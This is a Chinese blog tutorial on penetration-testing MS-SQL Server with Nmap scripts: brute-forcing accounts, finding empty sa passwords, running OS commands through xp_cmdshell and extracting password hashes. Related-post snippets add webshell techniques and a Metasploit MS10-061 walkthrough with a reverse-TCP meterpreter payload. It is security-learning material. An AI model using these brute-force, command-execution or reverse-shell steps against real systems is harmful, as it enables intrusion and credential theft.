利用Nmap对MS-SQLSERVER进行渗透

最新推荐文章于 2025-04-18 11:06:44 发布
最新推荐文章于 2025-04-18 11:06:44 发布
阅读量1k 收藏 3
点赞数 2
分类专栏: # 信安文章
本文介绍如何使用Nmap的脚本引擎进行SQL数据库渗透测试,包括利用默认端口1433发现数据库,通过暴力破解获取数据库账户信息,以及利用SQLServer执行系统命令和提取数据库哈希值破解密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

如今Nmap的脚本引擎从一个普通的端口扫描器转变为具有攻击性的渗透测试工具 。随着nmap各种脚本的存在。到目前为止,我们甚至可以进行完整的SQL数据库渗透而不需要任何其他的工具。

在本教程中,我们将看到在这些脚本中有些什么样的信息,以及如何通过Nmap从数据库中提取,还可以利用SQLServer来执行系统命令。

默认MS-SQL数据库上运行的端口为1433,为了及时发现有关数据库,我们需要执行以下脚本:

已经获取了数据库的版本和实例的信息。下一步检查是否有弱口令和数据库身份验证,需要运行以下nmap的脚本,它会执行暴力破解。

可以看到,没有发现任何数据。在这种情况下可以利用这个脚本来使用我们自己的用户名和密码字典,以便及时发现有效的数据库帐户。使用这个命令:

nmap -p1433 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt

还可以尝试另一种脚本,来检查Microsoft SQLServers是否存在空密码。

现在我们知道sa帐户没有密码。我们可以使用这个信息来连接数据库直接执行脚本,需要进一步Nmap有效身份认证。如果我们想知道在哪个数据库sa帐户访问或任何其他账户,可以运行ms-sql-hasdbaccess脚本与下列参数:


(查看某用户访问了哪些DB)

通过Nmap查询Microsoft SQL Server来获取数据库表。

SQL Server 2000 的xp_cmdshell 默认情况下是启用的,因此我们甚至可以执行操作系统命令。通过Nmap脚本中可以看到下面的图片:

(通过xp_cmdshell来运行’net users’)

最后还可以运行一个脚本来提取数据库,利用哈希值破解密码。工具:john the ripper

因为只有一个空口令的sa数据库帐户,所以没有任何的哈希值。

利用NmapMSSQL进行渗透测试
Palpitate_LL的博客
07-26 972
利用nmap脚本对MS SQL Server 进行渗透测试,获取吗目标用户名、数据库表等信息。
2021-06-01web渗透学习之SQLserver提权(mssql
qq_45290991的博客
06-01 293
我转了一篇个人觉得写得很好的博客,上一篇:2021-06-01sql提权 这一篇是月大佬的工具实战篇,csdn有人提供下载,我就不说了,直接上实战图片: 假设已经上传了大马,查找了这几个文件发现了sa用户的密码为123456: web.config config.asp conn.aspx database.aspx 登录(连接sql server) 执行cmd: ...
渗透测试必备的Nmap命令(非常详细),零基础入门到精通,看这一篇就够了
最新发布
chengxuyuanyy的博客
04-18 737
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
SQLServer注入技巧
weixin_34356310的博客
06-22 467
一、对于SA权限的用户执行命令,如何获取更快捷的获取结果? 有显示位 无显示位 其实这里的关键并不是有无显示位。exec master..xp_cmdshell 'systeminfo'生成的数据写进一张表的时候,会产生很多行。而我们要做的就是如何很多行通过显示位、或者报错语句一次性爆出来,这里的关键就是多行合一。 方法①BEGIN IFEXI...
利用Sql server 2005的进行渗透(攻陷Winows XP SP2篇、一)
qq_43093288的博客
03-29 397
(1)、SQL Server 2005 专业版下载地址: 注:SQL Server 2005 专业版分为两个光盘(1、2),两个光盘都安装才是完整版SQL Server 2005 专业版。 (2)、将服务器组件、工具、联机丛书和示例©,运行 SQL Native Client 安装向导(U)依次安装:(3)、若出现Microsoft Windows Installer 3.1未安装,则需要先安装才能继续安装数据库Microsoft Windows Installer 3.1下载地址: (4)、SQL Ser
SqlServer相关渗透思路
weixin_65550121的博客
12-11 1620
通过使用存储过程对注册表进行修改,替换成任意值,造成镜像劫持。前提条件:未禁止注册表编辑(即写入功能)xp_regwrite启用。
利用NmapMS-SQLSERVER进行渗透.pdf
12-05
利用NmapMS-SQLSERVER进行渗透.pdf
网络安全 Nmap
2401_88750910的博客
02-17 1095
Nmap 一款标志性的跨平台扫描器。它的原意为Network Mapper(网络映射器),具有相当强大的扫描功能,几乎适用于任何渗透场景。不少人甚至认为它就是全球最好的扫描软件。除了常规的网络扫描,Nmap还可根据NSE (Nmap scripting Engine)的脚本进行大量渗透工作,这种脚本是基于Lua编程语言,有点像javascript。正是NSE,使得Nmap不再普通。nmap按脚本分类扫描。
渗透测试学习笔记-Nmap使用
 RBPi' Blog
06-23 3924
名字 nmap – 网络探测工具和安全/端口扫描器 简介 nmap [ <Scan Type> ...] [ <Options> ] { <target specification&amp
Nmap扫描实战命令汇总
啊渊的专栏
07-26 7243
Nmap实战详解
JS-使用JS方法获取当前页面的URL(网址信息)
itsNekoDeng的博客
11-04 706
var url; url = window.location.href; /* 获取完整URL */ alert(url); /* http://127.0.0.1:8020/Test/index.html#testname=test */ url = window.location.pathname; /* 获取文件路径(文件地址) */ alert(url); /* /Test/index.html */ url = window.location.protocol; /* 获取协议 */ al
75.网络安全渗透测试—[SQL注入篇14]—[SQLSERVER+ASP-LOG日志备份拿webshell]
qwsn
01-19 2631
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER 日志备份相关概念 1、SQLSERVER的备份 2、数据库故障还原类型 3、ASP一句话: 4、此时我们就可以通过备份log文件,得到webshell了 5、优化webshell: 6、最终形成的payload: 7、如何判断是否拿到Webshell 二、SQLSERVER+ASP 日志备份拿webshell示例: 1、判断数据库名:mydb 2、备份日志,拿webshell 3、判断是否写入w
渗透测试---手把手教你SQL注入(12)---SQLsever利用SA权限执行系统命令--getshell
weixin_52796034的博客
10-21 1949
渗透测试---手把手教你SQL注入(10)---SQL注入拓展总结渗透测试---手把手教你SQL注入(11)---SQL注入拓展总结(SQLsever在线靶场实战)本节我们来讨论在SQLserver注入过程中的权限问题----
71.网络安全渗透测试—[SQL注入篇10]—[SQLSERVER+ASP-联合查询注入]
qwsn
01-18 2372
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 联合查询注入 1、SQLSERVER 相关概念: 2、SQLSERVER+ASP 联合查询注入示例: (1)判断是否存在注入:`and/or逻辑判断` (2)判断列数:`order by` (3)联合查询注入—判断回显位:联合查询要求,联合查询的列与被联合查询的`列的个数和类型一致`,类型一致问题可以使用null值绕过。 (4)联合查询注入—查询系
11.如无人之境——内网MSSQL服务器口令扫描及渗透
weixin_44023460的博客
01-02 475
11.1如无人之境——内网MSSQL服务器口令扫描及渗透 在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透。本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。 11.1.1使用SQLPing扫描获取mssql口令 在SQLPing程序目录,配置好passlist.txt和userlist.txt文件,如图1所示,设置扫
一次另类的mssql渗透之路
include_voidmain的博客
06-08 573
一次另类的mssql渗透之路
渗透测试基础-SQL server数据库之反弹注入
weixin_45488495的博客
04-15 728
渗透测试基础-SQL server数据库之反弹注入SQL server数据库SQLserver显错注入靶场演练堆叠注入SQLserver反弹注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! SQL server数据库 既然要学习SQLserver数据库的注入知识,那当然得先了解一下SQLserver的语句。 数据库都有着相通的地方,所以其SQL语句也相差不大。先来看一下SQLserver数据库是怎样的一个数据结构。 根据截
kili利用MS10-061漏洞进行渗透测试
02-27
### 使用MS10-061漏洞进行渗透测试 #### 工具准备 Metasploit是一款强大的开源安全漏洞检测工具,能够帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性评估[^1]。 #### 渗透环境搭建 攻击机配置为Kali Linux操作系统,IP地址设置为`172.16.5.28`。确保目标机器存在CVE-2010-2729/MS10-061漏洞,此漏洞涉及打印后台程序服务中的远程代码执行缺陷。 #### 执行Nmap扫描 启动Kali Linux终端,输入命令来运行快速端口扫描以确认目标系统的开放端口和服务版本: ```bash nmap -sV 172.16.5.x # 替换x为目标主机的实际最后一位IP地址 ``` 这一步骤有助于发现可能存在的易受攻击的服务实例[^4]。 #### 加载Metasploit框架 打开新的终端窗口或标签页,通过以下指令加载metasploit: ```bash msfconsole ``` 等待控制台初始化完成之后继续下一步操作。 #### 查找并选择合适的exploit模块 在metasploit提示符下键入下列命令查找适用于MS10-061漏洞的exploit模块: ```ruby search ms10_061 ``` 从返回的结果列表中挑选最匹配的目标平台与架构对应的exploit模块,通常会是类似于`windows/smb/ms10_061_spoolss_xpsp3`这样的路径。 #### 设置必要的参数选项 选定具体的exploit模块后,使用`use`命令加载它到当前session环境中;接着指定RHOSTS(远程主机)、PAYLOAD(有效负载),以及其他任何必需的自定义设置项: ```ruby use exploit/windows/smb/ms10_061_spoolss_xpsp3 set RHOSTS 172.16.5.x # 将"x"替换为实际的目标IP地址部分 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.16.5.28 # Kali自身的本地监听接口地址 ``` 这里选择了反向TCP连接类型的meterpreter payload作为示例。 #### 开始攻击尝试 一切就绪之后就可以发起针对已知脆弱性的主动探测了——只需简单地敲下回车即可触发整个过程: ```ruby run ``` 如果成功突破,则可以获得一个Meterpreter session用于后续深入探索受害者的内部网络资源。 #### 后续行动规划 一旦获取到了shell访问权限,可以根据具体需求开展进一步的信息收集工作,比如枚举用户账户详情、下载敏感文件等动作。不过需要注意的是,在真实世界里实施此类活动之前务必获得合法授权许可!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值